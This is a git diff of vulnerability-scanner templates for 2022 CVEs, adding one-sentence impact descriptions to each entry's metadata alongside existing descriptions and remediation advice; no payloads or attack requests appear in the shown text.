info: severity: high description: | WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can access sensitive files on the server, potentially exposing sensitive information. remediation: Fixed in version 2.8.5. reference: - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7 diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 9a57bb4d17..466bb1db40 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogic v11.3. reference: diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 5bd8161046..a0e02c99be 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the website. remediation: | Apply the latest security patch or upgrade to a newer version of RPCMS to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml index 3084754ade..8d787601f8 100644 --- a/http/cves/2022/CVE-2022-41840.yaml +++ b/http/cves/2022/CVE-2022-41840.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 977282b0a7..1a8d2ebc55 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index ae0a23d0f8..e075b8de4f 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index bb2a142929..afc3a603af 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further compromise of the affected system. remediation: Fixed in version 1.69.1 reference: - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index bcd5c1b983..d034635d87 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index e4fc5d20aa..3a6438833e 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index f769c8aff8..fca9dedf7e 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 8de7d1a687..2e61c546a0 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index fc441ddb6d..6b078e11ea 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Show all comments plugin (7.0.1) or apply the vendor-supplied patch to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index e979aab6b4..773e5ae7c8 100644 --- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Sunshine Photo Cart plugin before 2.9.15 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.9.15. reference: - https://wpscan.com/vulnerability/a8dca528-fb70-44f3-8149-21385039179d diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 1325a23249..559d1bc25a 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 9e7389a23a..ba194ba2ca 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue. reference: diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 7ac0949403..7adff34ad6 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index 2a05e42ef9..06065ab7a2 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue. reference: diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml index 63125280bf..bc8c2f658c 100644 --- a/http/cves/2022/CVE-2022-4306.yaml +++ b/http/cves/2022/CVE-2022-4306.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.4. reference: - https://wpscan.com/vulnerability/18d7f9af-7267-4723-9d6f-05b895c94dbe diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index 1ab6cc60e2..d8c8a0f4ed 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -6,6 +6,8 @@ info: severity: high description: | kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, potential data leakage, and further attacks on the server. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SSRF vulnerability in kkFileView 4.1.0. reference: diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index 2f2a5a2deb..6bd8f4b7a8 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 262b60e9e4..926686f564 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index c434f4f2b0..94ede95454 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index bc6d3f6413..f25e3160f5 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index 3f9a2bee8a..d689f2c962 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the necessary patches provided by the vendor to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index 296fc28802..eccc9d6fd2 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml index 5e1cacb62e..c4c0b833f1 100644 --- a/http/cves/2022/CVE-2022-4320.yaml +++ b/http/cves/2022/CVE-2022-4320.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.4.5. reference: - https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml index a276895caa..98280d4c26 100644 --- a/http/cves/2022/CVE-2022-4321.yaml +++ b/http/cves/2022/CVE-2022-4321.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress website, potentially leading to unauthorized access, data theft, or further compromise of the website. remediation: Fixed in version 1.1.2 reference: - https://wpscan.com/vulnerability/6ac1259c-86d9-428b-ba98-7f3d07910644 diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index 8e966b1a4f..a9202e2793 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.10.1. reference: - https://wpscan.com/vulnerability/5b983c48-6b05-47cf-85cb-28bbeec17395 diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 32f9fcdb9a..bc2b6c6b8a 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server. remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2. reference: - https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769- diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index 8bd7152a0d..afc67499fe 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. remediation: | Update the Fontsy plugin to the latest version (>=1.8.7) or apply the vendor-provided patch to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44877.yaml b/http/cves/2022/CVE-2022-44877.yaml index 4402472f87..0467bc7e23 100644 --- a/http/cves/2022/CVE-2022-44877.yaml +++ b/http/cves/2022/CVE-2022-44877.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to CentOS Web Panel version 0.9.8.1147 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index c701dcab4e..ee42ef4bff 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index a87e8ae434..5206c35de4 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index aa4255478e..293c0a8413 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index baf57d7b3b..ab029ac79f 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 74d911c817..c714824fad 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index b3b3fc22f5..2889320327 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 9c0ef4ed25..7e0232ed63 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add". + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Upgrade Rukovoditel to a version higher than 3.2.1 to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml index e357a922aa..c72d721d2b 100644 --- a/http/cves/2022/CVE-2022-45037.yaml +++ b/http/cves/2022/CVE-2022-45037.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version of WBCE CMS or apply the necessary patches provided by the vendor to fix the Cross Site Scripting vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index ea453bea03..dc9f74a4e8 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. 